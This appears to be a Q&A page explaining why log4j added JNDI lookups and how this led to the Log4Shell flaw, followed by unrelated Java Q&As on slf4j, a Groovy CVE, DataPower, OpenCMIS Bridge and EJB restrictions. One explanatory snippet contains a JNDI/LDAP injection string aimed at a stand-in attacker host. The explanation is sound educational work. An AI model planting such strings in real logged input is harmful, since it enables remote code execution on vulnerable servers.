Recently a 0-day exploit was disclosed that uses a security vulnerability in log4j and allows unauthorised remote code execution.
I'm wondering: what was the actual reason for log4j to implement these JNDI lookups, which caused the vulnerability in the first place?
What would be an example of using this LDAP lookup feature in log4j?
Log4j is a popular logging framework used in Java (you can gauge its popularity from the widespread impact of the vulnerability). Log4j offers a feature where you can add tokens to your logging pattern that get interpolated to fetch specific data. For example, "%d{dd MMM yyyy}" inserts the date at which the message was logged.
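For illustration, here is a minimal sketch of what that looks like from application code; the pattern string itself would live in the log4j2 configuration, and the class name here is arbitrary:

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class PatternDemo {
    private static final Logger LOG = LogManager.getLogger(PatternDemo.class);

    public static void main(String[] args) {
        // With a PatternLayout such as "%d{dd MMM yyyy} [%t] %-5level %msg%n"
        // configured for the appender, the %d token is replaced with the
        // timestamp of the event when this message is written out.
        LOG.info("Service started");
    }
}
```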
Meanwhile, JNDI (Java Naming and Directory Interface) is commonly used for sharing configuration settings across multiple (micro)services.
You can imagine a situation where somebody would like to log configuration settings, for example in error situations.
See this article, which explains it a bit:
A Java based application can use JNDI + LDAP together to find a Business object containing data that it might need. For example, the following URL ldap://localhost:3xx/o=BusinessObjectID is used to find and invoke the BusinessObject remotely from an LDAP server running either on the same machine (localhost) on port 3xx or on a remote machine hosted in a controlled environment, and goes on to read attributes from it.
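In plain Java, such a lookup is just a JNDI call with an LDAP URL. A rough sketch (the object name is the placeholder from the quote; the quote's port placeholder "3xx" is replaced here with 389, the default LDAP port, purely so the snippet is runnable):

```java
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;

public class JndiLdapLookupDemo {
    public static void main(String[] args) throws NamingException {
        // The JDK's built-in LDAP provider resolves ldap:// URLs; the object
        // bound under o=BusinessObjectID is fetched from the directory server.
        Context ctx = new InitialContext();
        Object businessObject = ctx.lookup("ldap://localhost:389/o=BusinessObjectID");
        System.out.println(businessObject.getClass().getName());
    }
}
```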
The change the article refers to is "LOG4J2-313: Add JNDILookup plugin." The motivation can be found in the Apache JIRA entry:
Currently, Lookup plugins [1] don't support JNDI resources.
It would be really convenient to support JNDI resource lookup in the configuration.
One use case with JNDI lookup plugin is as follows:
I'd like to use RoutingAppender [2] to put all the logs from the same web application context in a log file (a log file per web application context).
And, I want to use JNDI resources look up to determine the target route (similarly to JNDI context selector of logback [3]).
Determining the target route by JNDI lookup can be advantageous because we don't have to add any code to set properties for the thread context and JNDI lookup should always work even in a separate thread without copying thread context variables.
[1] http://logging.apache.org/log4j/2.x/manual/lookups.html
[2] http://logging.apache.org/log4j/2.x/manual/appenders.html#RoutingAppender
[3] http://logback.qos.ch/manual/contextSelector.html
The big problem with log4j is that, by default, this string interpolation was enabled everywhere, including for the content of logged messages. In the meantime message lookups have been disabled by default (and the JNDI lookup itself has been restricted in later releases), but that wasn't always the case.
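A hedged sketch of why that default was dangerous: if message lookups are active (as they were up to and including 2.14.1) and an attacker controls part of a logged string, the jndi token is resolved while the message is formatted. The host name and class name below are made up:

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class MessageLookupDemo {
    private static final Logger LOG = LogManager.getLogger(MessageLookupDemo.class);

    public static void main(String[] args) {
        // Imagine this value arriving from an HTTP header or a form field.
        String userInput = "${jndi:ldap://attacker.example/a}";

        // On vulnerable versions the ${jndi:...} lookup is evaluated while the
        // message is formatted, triggering an outbound LDAP request; on patched
        // versions the string is simply logged verbatim.
        LOG.error("Login failed for user {}", userInput);
    }
}
```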
Related
I am writing some code which is supposed to run (as a jar) on both the Flink and Spark platforms. However, these two platforms use different logging APIs (Flink uses log4j as the logging framework but slf4j as the API). What is the best practice for logging in this common code?
I tried the Log4j2 API in the common code, but it cannot log anything in Flink.
My idea now would be to obtain the logging context with the log4j API from the slf4j context (which is already launched by Flink). Is that correct?
Thanks
A safe way to go would definitely be to use SLF4J in your shared common library.
Since SLF4J is a logging facade, you don't have to force your users to use the same logging framework you're using in your library. See the user manual on this point:
Authors of widely-distributed components and libraries may code against the SLF4J interface in order to avoid imposing a logging framework on their end-user. Thus, the end-user may choose the desired logging framework at deployment time by inserting the corresponding slf4j binding on the classpath, which may be changed later by replacing an existing binding with another on the class path and restarting the application. This approach has proven to be simple and very robust.
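In the shared code that means depending only on the slf4j-api artifact and letting the platform supply the binding. A minimal sketch (the class name is arbitrary):

```java
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

// Lives in the common jar; it compiles only against the SLF4J API.
public class SharedComponent {

    private static final Logger LOG = LoggerFactory.getLogger(SharedComponent.class);

    public void doWork() {
        LOG.info("doing work on whatever platform is hosting us");
    }
}
```

On Flink these calls end up in its log4j backend through the slf4j binding Flink already ships; on Spark they go to whichever binding is on that classpath, without any change to the common jar.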
A security flaw in Groovy was detected in versions 1.7 to 2.4.3:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3253
The MethodClosure class in runtime/MethodClosure.java in Apache Groovy 1.7.0 through 2.4.3 allows remote attackers to execute arbitrary code or cause a denial of service via a crafted serialized object.
Does this affect "typical" Grails projects that retrieve data from user input (web forms), the DB, web services, etc. and assume this is all text, not serialized objects? In other words, is there any of this happening implicitly that we should be aware of?
Otherwise, what should we look for to ensure this bug isn't affecting us?
There is a Grails issue for exactly this, but no one has been able to show any way to exploit it in a Grails app yet: https://github.com/grails/grails-core/issues/9113
In short: "the plan is 2.5.1 and 3.0.4 will have Groovy 2.4.4"
We have some SOAP-based web services built with the Java-to-WSDL approach in our organization. There is now a security requirement to put limits on the request parameters passed to service methods. Currently the maxOccurs attribute of a parameter is unbounded in the WSDL because we model the parameter as a collection in Java.
To resolve this, it looks like we need to make some changes in the Java source to regenerate WSDLs that are compliant with this requirement. I know there are some unofficial APIs available that can be used as a replacement for JAXB and provide annotations which can be added to the Java source; this may result in the generated WSDL having maxOccurs set to a fixed, configured value. But there are some issues with using these third-party solutions due to licensing and other concerns. Also, we need to enable schema validation for the WSDL.
I would like to know if there is a solution that performs this check outside the scope of either the WSDL or the Java source. What I am looking for is a configurable solution that touches neither the WSDLs nor the Java source. We are using IBM DataPower in our organization. Can we configure a policy (or something similar) in DataPower that intercepts the web service request parameters and throws a fault if the number of occurrences of any web service method parameter is above a configured value?
Has anyone used DataPower for a use case like this? Or is there a better way of achieving it?
I believe you can limit the maximum length of messages. This will actually be better than a WSDL limit for preventing DDoS, as it will happen at the network layer.
I just noticed this project at Apache OpenCMIS:
https://svn.apache.org/repos/asf/chemistry/opencmis/trunk/chemistry-opencmis-bridge
There is no description, no documentation, and reading the code does not give many hints about what it is supposed to do.
Apache OpenCMIS sometimes releases great software silently, with little communication, so we might be missing another great piece of software here.
A Google Search for "OpenCMIS Bridge" returns only source code and the bare download page.
The OpenCMIS Bridge works like a proxy server. It accepts CMIS requests and forwards them to a CMIS server. On the way it can change the binding, and filter, enrich and federate data.
Here are a few use cases:
If a repository does not support the CMIS 1.1 browser binding, you can put the OpenCMIS Bridge in front of it. The bridge could then talk JSON to the client and AtomPub to the server. The client wouldn't notice that the server doesn't support the browser binding.
Code can be added to the bridge to redact property values or filter whole objects when they are transferred through the bridge. That could add another level of security that the native repository doesn't support.
Code can also be added to add or enrich object data. For example, property values could be translated from cryptic codes into readable values. Virtual secondary types can be added on the fly. Or additional renditions could be provided.
The bridge can also be used to provide different views of multiple repositories. Repositories of different vendors can be accessed through one unified endpoint. It's possible to build one virtual repository across multiple backend repositories that then, for example, allows a federated query across all backends.
The OpenCMIS Bridge is only a framework, though. It just provides the infrastructure and the hooks to add your own code and rules.
If you are looking for a real world application, check SAP Document Center (formerly "SAP Mobile Documents"). It is based on the OpenCMIS Bridge.
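From a client's point of view, the bridge is just another CMIS endpoint. A rough sketch with the standard OpenCMIS client API (URL, credentials and repository id are made-up placeholders):

```java
import java.util.HashMap;
import java.util.Map;

import org.apache.chemistry.opencmis.client.api.Session;
import org.apache.chemistry.opencmis.client.api.SessionFactory;
import org.apache.chemistry.opencmis.client.runtime.SessionFactoryImpl;
import org.apache.chemistry.opencmis.commons.SessionParameter;
import org.apache.chemistry.opencmis.commons.enums.BindingType;

public class BridgeClientDemo {
    public static void main(String[] args) {
        SessionFactory factory = SessionFactoryImpl.newInstance();

        Map<String, String> params = new HashMap<>();
        // The client talks the browser binding (JSON) to the bridge; the bridge
        // forwards the calls to the real repository using whatever binding that
        // repository actually supports.
        params.put(SessionParameter.BINDING_TYPE, BindingType.BROWSER.value());
        params.put(SessionParameter.BROWSER_URL, "http://bridge.example.com/cmis/browser");
        params.put(SessionParameter.USER, "user");
        params.put(SessionParameter.PASSWORD, "secret");
        params.put(SessionParameter.REPOSITORY_ID, "repo1");

        Session session = factory.createSession(params);
        System.out.println(session.getRepositoryInfo().getProductName());
    }
}
```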
In a Message-Driven Bean, am I restricted by the same rules as Session Beans (EJB 3 or EJB 3.1), i.e.:
use the java.lang.reflect Java Reflection API to access information unavailable by way of the security rules of the Java runtime environment
read or write nonfinal static fields
use this to refer to the instance in a method parameter or result
access packages (and classes) that are otherwise made unavailable by the rules of Java programming language
define a class in a package
use the java.awt package to create a user interface
create or modify class loaders and security managers
redirect input, output, and error streams
obtain security policy information for a code source
access or modify the security configuration objects
create or manage threads
use thread synchronization primitives to synchronize access with other enterprise bean instances
stop the Java virtual machine
load a native library
listen on, accept connections on, or multicast from a network socket
change socket factories in java.net.Socket or java.net.ServerSocket, or change the stream handler factory of java.net.URL.
directly read or write a file descriptor
create, modify, or delete files in the filesystem
use the subclass and object substitution features of the Java serialization protocol
It is always a good idea not to create threads manually (though an ExecutorService seems fine in some cases).
Actually, MDBs are very often used to address this limitation: instead of creating a separate thread, send a task object (put something like MyJob extends Serializable into an ObjectMessage) to the queue and let it be executed in the MDB thread pool. This approach is much more heavyweight but scales very well, and you don't have to manage any threads manually. In this scenario, JMS is just a fancy way of running jobs asynchronously.
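A rough sketch of that pattern (the queue name and job class are made up; the point is that the container's pool, not application code, runs the work):

```java
import java.io.Serializable;

import javax.ejb.ActivationConfigProperty;
import javax.ejb.MessageDriven;
import javax.jms.JMSException;
import javax.jms.Message;
import javax.jms.MessageListener;
import javax.jms.ObjectMessage;

// Hypothetical job type the producer puts into an ObjectMessage.
class MyJob implements Serializable {
    private static final long serialVersionUID = 1L;

    public void run() {
        // the actual work goes here
    }
}

// The container calls onMessage() from its own pool, so the application never
// creates a thread itself. How the queue is wired up (mappedName vs. activation
// properties) is container specific.
@MessageDriven(mappedName = "jms/jobQueue", activationConfig = {
        @ActivationConfigProperty(propertyName = "destinationType",
                                  propertyValue = "javax.jms.Queue")
})
public class JobMdb implements MessageListener {

    @Override
    public void onMessage(Message message) {
        try {
            if (message instanceof ObjectMessage) {
                MyJob job = (MyJob) ((ObjectMessage) message).getObject();
                job.run();
            }
        } catch (JMSException e) {
            throw new RuntimeException("Could not read job from message", e);
        }
    }
}
```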
These EJB restrictions are typically not hard restrictions. In fact, they're not caveats on making your EJBs work properly; they're more like advisories on how to make your EJBs portable across EJB containers.
From time to time, some very fussy EJB container providers (cough... WebSphere... cough) will actually enforce these restrictions through Java security policies, but I would say about half of those restrictions are routinely ignored (just using log4j in your MDB potentially violates about 30% of them).
Violating the other 70% probably indicates some architectural or design problem.
So, can you call System.exit() in an MDB? The answer is yes, but only once... :)
It sounds like, in your case, you need some of these restrictions to rein in potentially misbehaving plugins. I don't know whether MDBs are going to get you out of that problem. I suppose it depends on how much you trust the third-party developers, but rather than use the invocation-based models in EJB, I would install the components as JMX ModelMBeans. You can use the Java security model to limit what they can do, but I suppose that would defeat the purpose.
Perhaps, using some run-time (or load-time) AOP byte code engineering, you could rewrite all requests for threads so they are redirected to a per-component thread factory that you allocate, which limits the threads that can be created. You don't want to stop the plugins from doing whatever it is they do; you just don't want them to take down the whole server when they crash/stall/misbehave.
Interesting problem.
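For what it's worth, here is a sketch of the kind of per-component thread factory such a rewrite could hand out instead of letting plugin code call new Thread(...) directly (the limit and naming scheme are illustrative):

```java
import java.util.concurrent.ThreadFactory;
import java.util.concurrent.atomic.AtomicInteger;

// Caps how many threads a single plugin/component may create; the AOP rewrite
// would route the component's thread creation through an instance of this
// factory instead of java.lang.Thread directly.
public class ComponentThreadFactory implements ThreadFactory {

    private final String componentName;
    private final int maxThreads;
    private final AtomicInteger created = new AtomicInteger();

    public ComponentThreadFactory(String componentName, int maxThreads) {
        this.componentName = componentName;
        this.maxThreads = maxThreads;
    }

    @Override
    public Thread newThread(Runnable task) {
        if (created.incrementAndGet() > maxThreads) {
            created.decrementAndGet();
            throw new IllegalStateException(
                    componentName + " exceeded its thread budget of " + maxThreads);
        }
        Thread t = new Thread(task, componentName + "-worker-" + created.get());
        // A misbehaving plugin thread should not keep the whole server alive.
        t.setDaemon(true);
        return t;
    }
}
```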